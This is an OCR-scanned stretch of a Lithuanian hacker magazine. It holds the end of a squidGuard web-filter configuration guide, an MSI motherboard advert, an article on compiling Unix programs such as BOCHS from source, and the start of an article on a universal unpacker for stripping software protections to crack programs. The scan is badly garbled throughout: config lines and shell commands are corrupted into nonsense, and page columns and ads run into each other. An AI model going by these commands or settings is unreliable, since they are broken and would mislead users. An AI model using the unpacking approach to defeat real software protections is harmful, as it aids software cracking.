JJ m= Monday, 1=Tuosday, w= Mednesday, h= Thursday, 
// 1=Hriday, a=Saturday 
time: workhous 4 
weekly s 09:30-12:00 13:00-19:00 
Weekly m 09:00-12:00 13:00-19:00 
Weekly + 09:00-11:00 12:00-19:00 
Weekly w 09:00-12:00 
weekly h 09:00-13:00 
weekly f 09:00-12:00 13:30-18:00 
weckly o 08:20-13:00 13:30-1900 


1 


// tinklo vartotojai 
sc lan-uses | 

ip 192.168.10-192.148.1.254 
) 


// administratoriui 1ezervuotų adresų diapazonas 
sc main. 


ip 192168.1.1-192.168.1.10 
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// aprašome droudžiomo tutinio bazes 
desi advenisną ( 
domainlist advertising/domains 
urllist cdvertisiną/utls 


!/ Aisą reklamą nukieiniame į 0x0 dydžio reklaminę. antrattę 
redired http://127.0.0.1/cąi-bin/nulbanner.prą 
| 


(/ aprašome ACl'us 

a į 
// adminui leidžiama viskas, išskyrus reklamą 
main 4 


// direkiyva „pass“ leidžia arba“ draudžia 

// „all“ reiškia visą turinį; jeigu. reikia uždrausti 

1/ kokios nors klasės: turinį, tuomet prieš: klasės 

// pavadinimą rašomas šauktukas, pavyzdžiui „pass !porn“; 

!/ 1aktinis: žodis „none“ reiškia, kad priėjimas iš viso draudžiamas 
pass advertising all 


// draudžiamos užklausos: nukreipiamos i specialų skriptą 
redireci http://127.0.0.1/cgi-bin/sąuidGuard. ci? cientaddr- YhaBsreclass = 
sRtargetdlass = YtBurl You 


] 
Services and deamons 

alsa stopped Info Xx Onboot 

apmd running Info * Onboot 

atd running Info * Onboot 

chargen Ilnfo) Start when reguested 
chargen-udp Info Start when reguested 
crond running Info x Onboot 

cvs Info Start when reguested 
daytime Info Start when reguested 
daytime-udp Info Start when reguested 
devfsd running Info x Onboot 

dm running Info x Onboot 

echo Info Start when reguested 

Cancel 
5/ Servisai 


servisų paleidimo konfigūravimas. 


// pagrindiniai tinklo „gyventojai“ 
lan-uses | 


// eidžiame. viską, išskyrus nurodytus dalykus: su „I“ ir Iuinio klase 
pass laduli Iaudic-vidao orus Ihocking Irediredor Iwarez Iads aggressive 
Idiugs Igambling Ipublicit violence Ubarneddestination  Iaderisinų il 
redired  hip://127.0.0.1/cgi-bin/sąvidGuord.cgi?cientaddi  YnaBsteclass= VosRta 
rgeldloss= Yotšurl = You 
X 


// veiksmas pagal nutylėjimą 
deiault ( 
pass none 
redired http://127.0.0.1/cgi-bin/sąuidGuord.cgi?clientaddr  Yaksredass 06 
s8targotclass — Yoiurl= hu 
1 


] 


Taigi sguidGuard konfigūracijos byloje nėra nieko sudėtingo. Tiktai 
atkreipk dėmesį į tai, kad lokaliame kompiuteryje turi būti įdiegtas 
web serveris, o jo subkataloge cgi-bin turi būti byla sąuidGuard. 
Ci. Šio skri pto pavyzdį rasi kataloge /usr/share/sąuidGuard-1-X.XI 
sample. Atskirai jį kopijuoti į var/www/cgi-bin nėra būtina — tai 
padaroma automatiškai įdiegiant RPM paketą. 

Mums telieka susieti Sguid ir sąuidGuard. Tam į /etc/sguid/sąuid. 
conf pridėk šias eilutes: 


2 vi Jetdsąuid/sąvid.cont 
- // nurodome, kad sąuidėuord | veiks 


Start Stop kaip: nukreipiklis 
redirecor bypass on: 
stat Stop redirec progom | /usr/local/sąuidGuord/ 
bin/sąvidGuard 
Start Stop 
//. kiek sąuidūuad kopijų galima 
paleisti 
tedirec! children 1 
Po šito reikia perleisti Sąuid: 
Start Stop 
+ senice sąuid restart 
Byloje /var/log/sguidGuarad/ 
sąuidGuard.log tu turi pamaty- 
ti tokias eilutes (sąuidGuard 
paleistas ir paruoštas darbui): 
Start Stop 2006-03-19 15:45:14 [9601] sąvid- 
Gunrd 1.20 storted (1034683864.337) 
Stato Stop 2006-03-19 15:45:14 [9601] sąuidGuord 
teody for regussis (1034683864.353) 
Tikiuosi, jog šis straipsnis tau 
Ok 


padės sutaupyti ne tik laiko, bet 
ir pinigu. Jeigu tau iškils kokių 
nors klausimų, visada gali pasi- 
naudoti google paieška. 
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www.msi.com.tw 2 a D 
Athlon| |AthlonrPx AthlonX2 
Palaiko AM2 lizdą ir DDRII atmintį 


Jau tapo legenda... 


MSI 


| 2003 2006 


Neilas Armstrongas MSI pirmieji sukūrė pagrindines MSI pirmieji sukūrė MSI pirmieji sukūrė 
1* žigsnis mėnulyje plokštes A tipo lizdui AMD64 pagrindines plokštes pagrindines plokštes AM2 
tipo lizdui, 64-bitų, DDRII 


KSN Platinum KSN SLI Platinum K9N Diamond 


pasiūliusi platų pagrindinių plokščių AMD AM2 platformai asortimentą: 
MSI K9N SLI Platinum, MSI K9N SLI-2F, MSI K9N Platinum, MSI K9N Ultra-2F, MSI KON Neo-F, MSI KSNGM2-FID, MSI KSNGM+, MSI KSA Piacinum 


AMK), AMD Arno kotas, AMD Ato, AMD jų kombinacijos yra Advanced Mieso Device rc. prekiniai riklai Ki pavadinama ra naudojam k informacinams kala yr jų savininkų prekini enklai 


FERRUM 


kaprizingoms programoms 
Paslėptas rankinių kompiliacijų potencialas 
UNIX PROGRAMUOTOJAMS BŪDINGA 
NESLĖPTI IŠEITIES TEKSTŲ, TODĖL DIDŽIOJI 
PROGRAMŲ DALIS YRA ATVIRAI PLATI- 
NAMA. TACIAU LIAUDIS JAUČIA POTRAUKĮ 
JAU PARUOSTIEMS PAKETAMS, DAŽNAI 
NET NENUMANYDAMI, KOKIAS GALIMYBES 
TAIP PRARANDA! DAUGELIS VARTOTOJŲ 
PROGRAMAS PERKOMPILIUOJA, TACIAU 
TIK VIENAS KITAS TAI DARO TEISINGAI. 
RANKINIS KOMPILIAVIMAS — PAKANKAMAI 
SUDĖTINGAS, NEAKIVAIZDUS IR KARTAIS 
PRIEŠTARINGAS PROCESAS, KUR| MES 
DABAR IR PABANDYSIME ISTOBULINTI. 


[Įvadas] Kam kankintis ir kompiliuoti programą rankiniu 
būdu, jeigu galima tiesiog parsisiųsti paruoštą paketą? 
Štai pagrindinės priežastys, dėl kurių išeities tekstai 
geriau už paruoštus paketus: 

* paruoštus paketus rasi ne visoms platformoms (pa- 
grinde tai pasakytina apie x86-64) 

* praktiškai niekada negausi paruoštų einamų versijų paketų, 
orelease'ai išeina nedažnai, priversdami mus naudoti dviejų 
metų senumo versiją (ir tai toli gražu ne pagražinimas!) bei 
pavydžiai žvilgčioti į kolegas, kurie pasiėmė paskutinę alfą 
su daugybe visokių naujovių ir skanėstų 

* paruošti paketai pajungia ne visas išeities tekstuose 
realizuotas savybes (konkrečiau šnekant, į populiaraus 
emuliatoriaus BOCHS sudėtį įeina išorinis interaktyvus 
Turbo Debugger stiliaus derintuvas, kai tuo tarpu ofi- 
cialiuose paruoštuose paketuose rasi tik paprasčiausią 
integruotą „debug.com“ tipo derintuvą) 

* daugeliui programų trečiųjų šalių gamintojai kuria 
papildymus (praplėtimus), kurie gali būti įdiegti tik 
perkompiliuojant programą 

* dažnai paruoštame pakete įjungiama daug papildomų 
komponentų, kurie tik naudoja procesorių ir atmintį, 
tačiau mums jų niekada neprireiks 

* oficialūs paketai kompiliuojami su tipinėmis optimiza- 
vimo opcijomis, kurios bendros visiems procesoriams, 
todėl gaunamas neefektyvus ir neoptimalus kodas (arba 
net iš viso neveikiantis, pavyzdžiui, senų 80386 arba 
80486 tipo procesorių atveju) 

* išėjus naujai versijai reikia siųstis visą paketą užuot 
pasiėmus tik pakeistas bylas (tai aktualu dažnai atnau- 
jinamoms programoms) 

* jeigu programoje aptinkamas pažeidžiamumas, tai 
atakuoti paruoštą paketą paprasčiau, kadangi hakeris 
žino tikslią visų mašininių komandų buvimo vietą ir 


HACK IMPLANT SOFTWARE 


SCENA 


UNIXOID 


CODING 


UNITS 


atminties išsidėstymą 

* išeities tekstams skirti pataisymai išeina kur kas greičiau ir 
dažniau, nei paruoštiems paketams 

* naudotis paruoštais paketais — tai ne unix-way ir visiškai 
nehakeriška 

O dabar pateiksime pagrindinių priežasčių, dėl kurių paruošti 
paketai geriau už išeities tekstus, sąrašą: 

* paruoštas paketas „sveria“ kur kas mažiau už išeities teks- 
tus, net jeigu juos suspaustum pačiu geriausiu archyvatoriumi. 
Labiausiai nuo to kenčia lėtų modemų savininkai, juo labiau, 
kad siuntimo pratęsimą (resume) pripažįsta toli gražu ne visi 
serveriai 

* išarchyvuoti išeities tekstai užima labai daug vietos (kartais 
net šimtus megabaitų), o pats kompiliavimas reikalauja daug 
laiko, kuris, kaip žinia, visada veikia prieš mus 

* „rankinis“ programos konfigūravimas pagal savo poreikius 
reikalauja įdėmaus dokumentacijų skaitymo ir konfigūracinių 
skriptų studijavimo 

* dažnai reikia siųstis papildomas antraščių bylas ir bibliotekas, 
atnaujinti kompiliatorių ir t.t., kas vėlgi reikalauja laiko, eikvoja 
tinklo srautą ir disko vietą 

* automatinių įdiegiklių kokybė dažnai galėtų būti geresnė, o 
sukompiliuotą programą dar ilgai tenka tobulinti apdorojant 
dilde, rankomis, uodega ir galva 

* paruoštuose paketuose paprastai gali būti įvairių papildymų, 
tokių, kaip nestandartinės spalvinės schemos ir kiti trečiųjų šalių 


gamintojų kuriami komponentai, kurių gali nebūti „oficialiuose“ 
s tekstuose 

tūkstantis priežasčių, dėl kurių „rankiniu“ būdu sukompiliuota 
ama gali veikti neteisingai arba nestabiliai. Pavyzdžiui, vartotojas 
aktyvavo gundančia opciją, kuri šiuo metu yra „under construction“ 
stadijoje ir sukelia klaidas pačiose netikėčiausiose vietose 

* iš išeities tekstų sukompiliuotas programas kur kas sunkiau 
pašalinti iš sistemos, nei tą patį rom paketą (beje, yra tam tikrų 
Šį procesą automatizuojančių paketų) 

* jeigu oficialiame pakete nėra mums reikalingų opcijų, 
yzdžiui, x86-64 galimybės BOCHS emuliatoriuje, tai 
praktiškai visada galima surasti neoficialų paketą, kuriame visa 
adarė už mus. Tiesa, toli gražu ne visi jie būna sukompil- 
eisingai 

patarlė „geriau per dieną nuskristi, nei per valandą nubėgti“ 
netinka žiauriame šiuolaikinio verslo pasaulyje, todėl jeigu 
paruoštas paketas garantuotai veikia, už eksperimentus su ran- 
kiniu kompiliavimu „tiesiog šiaip sau“ mums niekas nemokės 


Universalaus sprendimo nėra! Kiekviename kelyje galima 
rasti savų privalumų ir trūkumų. Aš rekomenduoju: iš pradžių 
parsisiųsk paruoštą paketą, šiek tiek padirbėk su programa, 
išsiaiškink katalogų struktūrą, perprask pagrindines galimybes, 
r tik tuomet pradėk eksperimentuoti. Mes bent jau prieš akis 
turėsime teisingai sukompiliuotą etaloną, todėl jeigu kompiliavi- 
mas nepavyktų (arba sukompiliuota programa atsisakytų veikti), 
paketas mus išgelbėtų 


[Filosofinis pasiruošimas] Programos kompiliavimas visada 
prasideda nuo instrukcijos skaitymo. Užeiname į pagrindinę 
produkto svetainę, joje surandame download skyrelį, 
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Veikiantis konfigūratorius 


parsisiunčiame changelog (changes, what's new, readme) 
ir atidžiai skaitome. Kuo mūsų versija skiriasi nuo šios, ar 
mums reikia visų naujovių, ar ne? Praktika rodo, kad daugelio 
programų plėtojimasis sustoja dar pradinėje stadijoje, o po to 
jos tiesiog „storėja“, taip apaugdamos pertekliniu funkcionalumu 
ir eidamos „Microsoft“ keliu. Nesivaikykime mados, siekdami 
naudoti paskutines programų versijas tik todėl, kad jos yra 
„paskutinės“. Programa tai ne žaislas! Tai — įrankis! Net 
ir nedideli sąsajos arba veikimo ypatumų pasikeitimai dažnai 
sumažina darbo našumą. Geras hakeris 
su klaviatūra dirba kaip profesionalus 
pianistas — pirštai tiesiog skraido. Visi 
judesiai išmokti mintinai, o mokytis iš 
naujo vien tik naujos versijos vardan... 
niekas to nedarys, jeigu, be abejo 
šioje versijoje nėra ko nors iš tiesų 
reikalingo. 

Vartotojai šiuo atžvilgiu progresyvesni ir 
siunčiasi viską, kas tik pakliūna į jų regos 
lauką. Vyrauja išankstinis nusistatymas, 
kad geriausia siųstis stabilias šakas 
(stable) arba release'us, manoma, 
kad jie veikia kur kas patikimiau už 
eksperimentines alfa/beta versijas 
Tame yra sava tiesos dalis, tačiau 
bendru atveju viskas kiek kitaip. Sta- 
bilios versijos išeina pakankamai retai 
Per šį laiką jose surandamos klaidos, 
pašalinamos tarpinėse versijose 
kurių statusas yra „nestabilios“. Kai 
gamintojai nekovoja su klaidomis, jie 
produktejdiegia naujas arba praplečia 
jau egzistuojančias funkcijas. 


perkompiliavimo su 


[Jaunojo kovotojo instrukcija) 
Išeities tekstai paprastai platinami 
populiariais archyvatoriais, tokiais 


59) 


[HAKERIS 4409 [4C 


60) 


06 


[HAKERIS 4409 [A 
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Tuomet kokia prasmė terliotis su CVS? 


TARGET .PLATFORM=1386 


|4 Please select Larget operation system. Valid values are: 
1 dos. 052. win32, linux. unix. beos, gnxd. gaxb 

H E S ži iai 
TARGET OS 


nix 


+ Please add any host specific flags here 

|2 (like -feall-used-R -fcall-saved-R -mrtd -mregpara-3 
|8 Notes: You can also define -D. EXPERIMENTAL VERSION flag. 
|t build experimental version uith fastcall technology. 


reg-alloc 


|2 You can also define: 
| -DHAVEMMX 
1 -DHAVE MMK2 
|+ -DHAVE SSE 


exists on K/* and P3+ 
exists only on P3* 
| -DMAVE-SSE2 | exists only on P4+ 
|* -DHAVEL3DNON | exists only on AMD's K6-2+ 
|t „OMAVE0NDNEX exists only on AMD's K7+ 
Ihese Plays are implicitlų defined uhen you select 


sr 


3/ Debug GUI 

Į vieną neoficialų paketą įeinantis grafinis integruoto BOCHS derintuvo „snukelis“ 

kaip gzip arba bzip2, supakuotuose archyvuose, rečiau — CVS 
medžio pavidalu. CVS (Concurrent Version System) — viena 
Iš populiariausių versijų valdymo sistemų, leidžianti prie vieno 
projekto dirdti kellems programuotojams. Ši sistema ne tik seka 
pasikeitimus bei sinchronizuoja visų dirbančiųjų bylas, bet ir 
apriboja privilegijas, kas ir kur gali rašyti. Anoniminiai projekte 
nedalyvaujantys vartotojai turi tik skaitymo teises. 

Norint pradėti dirbti su CVS medžiu, reikia prisijungti prie nuto- 
lusios sistemos anonymous vardu (daugumoje *nix distributyvų 
CVS klientas jau būna įdiegtas), o po to įvykdyti CVS komandą 
checkout ir taip gauti išeities tekstus (šiuo atveju — gauti 
emuliatoriaus BOCHS kodą): 


d:pserversanonymous((+)cys.bochs.sourceforge.net:/cvsroot/bachs login. 
(Logaing in to: anonymauscėd es, bachs:sourcelorge.net) 

(VS password: (there is no password, just press Enter) 

$ —13 —d:pserver:anonymous E? cys.bochs.sl.net;/cvstool/bochs checkout bochs 
5 server: Updating bochs 
U bochs/.bochsrc 

U bochs/.cont.AIX.4.3.1 

U bochs/.conl.beos-x86-R4 
U 

||| 


bochs/.conf.macos 
buchs/patchos/potch.seą-linit-rea! 


Net ir prisijungus per skirtinę liniją visa ši procedūra gali užtrukti 
Ugokai, kadangi bylos perduodamos jas menkai suspaudžiant 
(ypač jeigu naudojamas pserver metodas, o ne ext su ssh sUs- 
paudimu), o siuntimo pratęsimas įmanomas tik dalinai: pilnai 
parsiųstos bylos po netikėto ryšio nutraukimo pakartotinai nėra 
perduodamos, tačiau nepabaigtos bylos pradedamos siųsti 
nuo pradžios. Jeigu ryšys dažnai trūkinėja, tokia situacija gali 
iš tiesų erzinti. 


g basic |: 1386 1486 

I" gec-2,9x : 1586 1686 p3 pd k6 k6.2 athlon 

" pRcC + i5ū6max i6ibmas pAmax pdnax kb kėmas K6 Janx Gx86 GxObmax 
1 athlon.mnx 

|t Other platfora : generic 


1f you Uant to 


mostly common for all cpu since Pentiun-WMX and cospalible 


ICC max oplini zation 


Ar nebūtų paprasčiau (greičiau, pl- 
giau) pasinaudoti paruoštu archyvu? 
Vienareikšmiško atsakymo į šį klausimą 
nėra. Pradėsime nuo to, kad kai kurios 
programos platinamos tik per CVS. Ar- 
chyve, jeigu toks iš viso pateikiamas, 
dažnai būna ne visos bylos arba jis nėra 
atnaujinamas mėnesių menesius. Kita 
vertus, išėjus naujai versijai visą archyvą 
tenka siųstis iš naujo (o tai, vėlgi, 
megabaitai), kai tuo tarpu CVS klientas 
pasiima tik realiai pakeistas bylas, kas 
iš esmės taupo tinklo srautą. 


estic I 


[Pataisymas pataisymui nelygus] 
Daugelis programuotojų pataisymus 
kuria su įrankiu diff (žr. man diff), 
kurio pavadinimas kilo iš sutrumpinto 
angliško žodžio „difference“ — skirtu- 
mas. Šis daikčiukas sulygina kiekviena 
bylų eilutę ir atvaizduoja tik pasikeiti- 
mus. Prieš eilutę išvestas „—“ ženklas 
reiškia, kad ši eilutė buvo pašalinta, o 
„+“ — Kad pridėta. Bylos pavadinime 
pridedama „—“/.+ + +" ir visi distrib- 
utyvo pasikeitimai, kad būtų patogiau, 
dažniausai sudedami į vieną diff'ą. Pasikeitimų bylos paprastai 
turi „„diff“ arba „.patch“ praplėtimą, tačiau net ir be to jas 
lengva atskirti. Pataisymo sukūrimo pavyzdys: 
S dilf —piuN originali byla.c modilikuota byla.c > my.patdh 

Diff pataisymą iš esmės gelima įdiegti ir rankiniu būdu. 
Elegantiškesnis būdas pasinaudoti įrankiu patch (žr. man 
patch), kuris visiškai automatizuoja šį procesą. Bendru atveju 
Jo iškvietimas atrodo taip: 


5 dd grogiame 
S pali p1 < —/mypaldh 

Čia „my.patch“ — diff bylos pavadinimas, o „p1“ — įdėjimo lygis. 
Numeris <1> reiškia, kad mes patch iškviečiame iš pagrindinio 
programos katalogo. 

Pataisymo įdiegimas — grįžtama operacija, todėl prireikus įdiegtus 
pakeitimus galima pašalinti, pasinaudojant raktu „-RO“, kuris 
atgal sugrąžina visas pakeistas eilutes. Taip pat atkreipk dėmesį 
į raktą „-b“, kuris sukuria rezervines taisomų bylų kopijas. 


[Pradedame kompiliavimą] Pradėsime nuo to, kad, priešingai 
nei Windows pasaulyje, kur programa įdiegiama/kompiliuojama 
paleidžiant setup.exe arba nmake.exe, *nix pasaulyje kompil- 
iavimo procesas prasideda... nuo dokumentacijos skaitymo! 
Skaityti dokumentaciją būtina! Net jeigu kompiliavimas su 
nustatymais pagal nutylėjimą pavyksta be jokių problemų, gauta 
konfigūracija gali būti neoptimali. 

Paprastai prie išeities tekstų pridedama byla install arba readme. 
Jeigu archyve nėra nieko panašaus (kaip kad tai yra BOCHS 
atveju), reikia kompiliavimo instrukcijos bandyti ieškoti oficialioje. 


produkto svetainėje. Kritišku atveju instrukcija saugoma bylose 
configure ir makefile. 

Priminsiu, kad tipiška daugelio programų kompiliavimo/idiegimo 
tvarka atrodo štai taip: 


$ Jiontijurė 
S make 
+ make install 


Byla configure yra gana sudėtingas skriptas, kuris analizuoja 
einamą konfigūraciją, atpažįsta einamą platformą, nustato, ar 
yra visos reikiamos bibliotekos, bei valdo kompiliavimo opcijas 
(kokias savybes įjungti, o kokių — ne). Jo darbo rezultatas yra 
sugeneruota makefile byla, kuri programą surenka (sukompil- 
iuoja, sulinkina) į viena visumą. 

Kai kurie konfigūratoriai gali pasigirti pažanga vartotojo sąsaja 
ir veikia interaktyviu režimu, tačiau tai nėra taisyklė, 0 veikiau 
maloni išimtis. Kur kas dažniau Kompiliavimo opcijos nurodo- 
mos per komandinės eilutės raktus arba net pataisant pačią 
konfigūravimo bylą. 

Kompiliavimas su nustatymais pagal nutylėjimą mums ga- 
rantuoja, kad programa bus teisingai sukompiliuota ir galbūt 
net suveiks, tačiau ten gali ir nebūti mums reikalingų režimų 
galimybės. Konkrečiau šnekant, jau ne kartą minėtas BOCHS 
režime pagal nutylėjimą kompiliuojamas be SoundBlaster'io, 
tinklo plokštės, sse/mmx emuliavimo, be x86-64, interak- 
tyvaus derintuvo ir virtualaus kodo vykdymo greičio optimi- 


zavimo. Konfigūracijoje pagal nutylėjimą gauname tiesiog 
nuostolinga emuliatorių! Be abejo, galima nemąstant aktyvuo- 
ti visas opcijas, tačiau tai tikrai ne pati geriausia Idėja. Visų 
pirma, daugelis opcijų konfliktuoja viena su kita, antra, papil- 
domi komponentai ne tik padidina sukompiliuotos bylos dydį, 
tačiau ir sulėtina programos veikimo greitį. Taigi sudarinėjant 
„Meniu“ reikia būti labai atidžiam ir apdairiam. 

Kitaip tariant, priversti BOCHS pripažinti 4836-64 kartu su inte- 
gruotu derintuvu galima taip: 


S. Jkantigure --enoblo-x86-64  --enable-debugger 


O ką daryti, jeigu dokumentacijoje iš viso nėra jokių užuominų 
apie kompiliavimo opcijas arba mus kankina neaiškios abejonės, 
jog šis aprašymas nėra pilnas? Tuomet su savo mėgiamiausiu 
redaktoriumi atsidarome configure ir atvirai peržiūrime prieina- 
mas opcijas. Jeigu mums pasiseks, tai šalia jų bus ir komentarai. 
Dar vienas variantas — išbandyti ./configure --help, galbūt tau 
bus atsakyta. 

Kai kurios programos (pavyzdžiui, hex redaktorius biew) iš 
viso neturi configure bylos. Tai reiškia, kad programą teks 
konfigūruoti rankiniu būdu, redaguojant makefile. Skamba kur 
kas sudėtingiau, nei yra iš tiesų. Makefile struktūra ganėtinai 
paprasta ir praktiškai tai yra komandų bei kintamųjų seka. 
Būtent kintamuosius mes čia ir valdysime! Galimos reikšmės 
paprastai aprašomos čia pat, komentaruose. 

Makefile bylos fragmentas su skirtingomis opcijomis: 


TARGET PLATFORM= i686 
TARGET 0S= unix 


08 | stos | Step | Nent) os ikos -DIMVE 56t 
Reikia iš anksto pasiruošti tam, kad 
Rokadi dalis kintamųjų bus susijusi su auto- 
——— riaus aplinka (bus nurodyti absoliutūs 
P.LIV Physical, Linear, or Virtuai Restat | keliai iki galutinių katalogų, prijungiamų 
e bylų, bibliotekų ir t.t.) arba bus iš viso 
1 Press ENTER or cick ADD neinicializuota, todėl šiuo atveju jas 
nurodyti turėsime mes patys. Kai ku- 
Breskpoints | Watehpoinis || Memory | Siructuros | Contig | Hšstory | rios make bylos valdomos per aplinkos 
Stack EAx [0x160001 EFLAGS [65212 LDTR (0x6 invalid kintamuosius, kuriuos mums vėl gi rei- 
EBK|Bx7000 EP |ex2000 "———— aga, kia šutanišbuos prieš kompiliavimą, 
2 05202 pavyzdžiui: 
UA OxFDOS bai Sa CS |0x0 valid GDTR |B-0x0 L-0x0 ai 
a“ Ika ai S eau LAD aa PDCURSES. HONE =S(PDCURSĖS SRCOIR) 
EBP 0x0 DS |0x0 valid || H Gary AN “ 
ESI |0x0 ES |0x0 vaid (] Parity Štai ir atėjo ta iškilminga akimirka! Visos 
EDI |0x500 FS |0x0 valid . Ausillarų opcijos sukonfigūruotos, o mes apmirusia 
ESP |OxFFFE GS |0x0 valid 0 - širdimi konsolėje surenkame „make“. 
K d +) Kompiliavimo procesas prasidėjo! Derėtų 
Kom [1 Trap pastebėti, kad gana dažnai kompiliavimą 
DR 050 TR3 |0x0 CAO |0x60000010 7 Intenrapt nutraukia pranešimai apie klaidas. Ką 
| 0 Direction 3 ns N 
DR2 0x0 TR4 [0xo Cat [0x0 H Overfiow daryti? Svarbiausia — ne panikuoti, o per- 
DA3 /0x8 TAS |0x0 AC R PL ši B skaityti klaidos pranešimą ir jį išanalizuoti. 
ma TE S e bibliotekos crbeanraštės yes Šiinjau 
| 4 
TS Dilsė mas As 52 LLA 1! šita dalyką turėjo išaiškinti konfigūratorius 
4 BF (jeigu tik jis yra), tačiau turint internetą 


Programos konfigūravimas pataisant make bylą 
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komponentus. Tiktai reiktų žinoti, ką siųstis! Deja, toli gražu 
ne visada makefile praneša „oficialų“ bibliotekos pavadinimą. 
Dažniau mums paprasčiausiai pasakoma: „Neradau bylos su- 
per-duper-zip.h“. Ne bėda! Paleidžiame paiešką, įvedame bylos 
pavadinimą ir žiūrim, kuriam paketui ji priklauso ir iš kur ją galima 
parsisiurbti. 

Taip pat būtų neblogai nueiti į produkto palaikymo forumą (jeigu 
toks yra) arba tiesiog klaidos pranešimą sušerti gūglei. Juk 
greičiausiai ne mes pirmi susidūrėme su tokia problema! O jeigu 
Jau taip, tuomet šis klausimas jau turėjo būti svarstomas įvairiuose 
forumuose, kurie greičiausiai mums ir pateiks atsakymą. Jeigu 
tai nepadės — dar kartą skaitome dokumentaciją, atkreipdami 
dėmesi į tai, kokios bibliotekos ir sisteminiai komponentai turi 
būti įdiegti. Taip pat galima pamėginti pažaisti su kompiliavimo 
opcijomis, atjungiant viską, ką tik galima atjungti. 

Blogiau, kai susiduri su grubiomis pačių kūrėjų klaidomis. Juk 
make bylas kuria žmonės, kurie jas testuoja ne visose platfor- 
mose. Jeigu taip — pamėgink susisiekti su gamintojais arba 
sukompiliuoti programą su kitu kompiliatoriumi (su kita kompili- 
atoriaus versija). 


[Besvorės programos] Pagal nutylėjimą daugelis programų 
kompiliuojamos su derinimo informacija, kas smarkiai supapras- 
tina derinimą, tačiau tuo pačiu padidina galutinį programos dydį. 
Kadangi svetimų programų derinimas neįeina į mūsų planus, 
derinimo informaciją geriau pašalinti. Tai galima padaryti arba 
konfigūravimo stadijoje, pavyzdžiui, su „„/configure --disable-de- 
bug“, arba „išpjaunant“ šią informaciją iš e/f bylos, apdorojant 
ją su įrankiu strip. Tačiau prieš imdamiesi konkrečių veiksmu, 
paleiskime programą file ir pažiūrėkime, ką ji mums pasakys apie 


mūsų bandomąjį triušį, pavyzdžiui, BOCHS: 


S file bochs 
bochs: ELF 32-bit LSB axecutable, Intel 80386, version 1 (SVSV), for GNU/linux 
2.20, dynamically linked (uses shared libs), not stripped 


Aha, „not stripped“. Štai kodėl BOCHS užima visus 9 Mb! 
Čiumpame į rankas skalpelį ir su strip iš bylos pašaliname der- 
inimo informaciją: 


$ strip bochs 


Byla iš karto sumažėja iki 1 Mb, taip susitraukdama net devynis 
kartus, tuo pačiu neprarandant jokio funkcionalumo! 


[Įdiegimas sapne ir tikrovėje] Dažniausiai sukompiliuota 
programa dar nėra paruošta darbui. Mums dar reikia daug ką 
padaryti: pašalinti tarpines kompiliavimo metu sukurtas bylas (bib- 
liotekas, objektines bylas), suderinti konfigus, surūšiuoti duomenų 
bylas, o esant būtinybei — pakeisti sistemos nustatymus. Už tai 
atsakinga komanda „make install“, bet ji realizuota toli gražu ne 
visose programose. Paimkime kad ir tą patį biew. 

Kita vertus, automatinis įdiegimas — tai ruletė. Visi mes žinome, 
ką su sistema gali padaryti netinkamas „setup.exe“. Taigi prieš 
surenkant „make install“ neblogai būtų žvilgtelėti į mūsų makefile 
„install:“ sekciją ir pažiūrėti, kas joje ruošiamasi daryti. O jeigu 
tai mums nepatiks? 

Galima pamėginti sukomanduoti „make uninstall“, pašalinančią 
programą iš sistemos, tačiau didžiojoje daugumoje atvejų ji 
nerealizuota. 

Yra toks naudingas dalykėlis, kuris vadi- 
nasi Check!nstall (checkinstall.izto.org). 
Tai nemokamai platinamas įrankis, virtu- 


alioje mašinoje trasuojantis „make install“ 


ir automatiškai generuojantis pilnavertį bet 
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Kokio tipo „distributyvą“: Slackware, RPM 
arba su Debian suderinamą paketą, į sistemą 
įdiegiamą su atitinkamu instaliacijų valdymo 
įrankiu, kuris visada gali korektiškai padaryti 
uninstall, net jeigu tai ir nebuvo numatyta 
programos autoriaus. Tiesiog vietoje „make 
install“ mes turime parašyti „checkinstall“ ir 
šiek tiek palaukti. 

Beje, didžioji įdiegiklių dalis programas įkelia į 
katalogą /usr/local/bin, kas ne visiems patinka 
Teisingi konfigūratoriai palaiko raktą „--prefi 
leidžiantį programą įdiegti kur tik nori, pavyzdžiui, 
į „„/configure --prefix=/opt“, o neteisingi 
priverčia tai daryti savomis rankomis. 
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Universalus išpakuotuvas 
Universalaus išpakuotuvo kūrimas: 
algoritmas 

BANALIAUSIAS KOKIOS NORS PRO- 
GRAMOS NULAUZIMAS VYKSTA TOKIU 
PRINCIPU: PARSISIUNTEI ĮSPAKUOTUVĄ, 
ISPAKAVAI, NULAUZEI, TAČIAU PROGRA- 
MUOTOJAI NĖRA VISIŠKI DEBILAI IR GALI 
NUMATYTI TOKIĄ ĮVYKIŲ EIGĄ. BŪTENT 
TODĖL JIE STENGIASI NAUDOTI TOKIAS AP- 
SAUGAS IR PAKUOTUVUS, KURIEMS DAR 
NĖRA PARAŠYTOS ATITINKAMOS LAUŽIMO 
PROGRAMOS. TUOMET HAKERIUS GELB- 
STI UNIVERSALŪS ĮRANKIAI. 
APIBENDRINĘS SAVO KOVOS SU PAKUO- 
TUVAIS PATIRTĮ, SIO STRAIPSNIO AUTO- 
RIUS KRISAS KASPERSKIS SIŪLO UNIVER- 
SALAUS IŠPAKUOTUVO ALGORITMĄ, KURIS 
SUSIDOROJA SU 9996 APSAUGŲ. 


[OEP beieškant] Universalaus išpakuotuvo kūrimas pra- 
sideda nuo OEP (Original Entry Point — pradinis įėjimo 
taškas) nustatymo algoritmo, kuris suseka išpakavimo 
užbaigimo momentą su po to einančiu valdymo per- 
davimu „programai nešėjai“. Tai pati sudėtingiausia 
universalių išpakuotuvų dalis, kadangi bendru atveju rasti 
pradinį įėjimo tašką neįmanoma. Taigi tenka imtis įvairių 
gudrybių. 

Dažniausiai tam naudojamas pažingsninis trasavimas, 
kuriam pakuotuvas/protektorius dažniausiai lengvai 
pasipriešina. 

Problemos neišsprendžia ir nulinio žiedo trasuotojai. 
Susidoroti su jais iš taikomojo lygio (o daugelis pakuotuvų/ 
protektorių veikia būtent jame) praktiškai neįmanoma, 
todėl panašaus trasuotojo sukūrimas pradedantiesiems 
dažnai yra neįveikiama Užduotis. 

Nors aš turiu nuostabaus trasuotojo, kurį sukūrė WASM 
grupė, išeities tekstus, nusprendžiau eiti kitu keliu, apsiri- 
bodamas tik aparatiniais sustojimo taškais, kurių sukūrimui 
visiškai nebūtina rašyti tvarkyklės. Mano užrašuose, kurių 
elektroninę kopiją gali parsisiųsti iš ftp:/nezumi.org.ru, 
parodyta, kaip tai padaryti iš taikomojo lygio net ir be 
administratoriaus teisių! Pirmame etape kaip pagrindinę 
eksperimentavimo priemonę mes naudosime įvairiais 
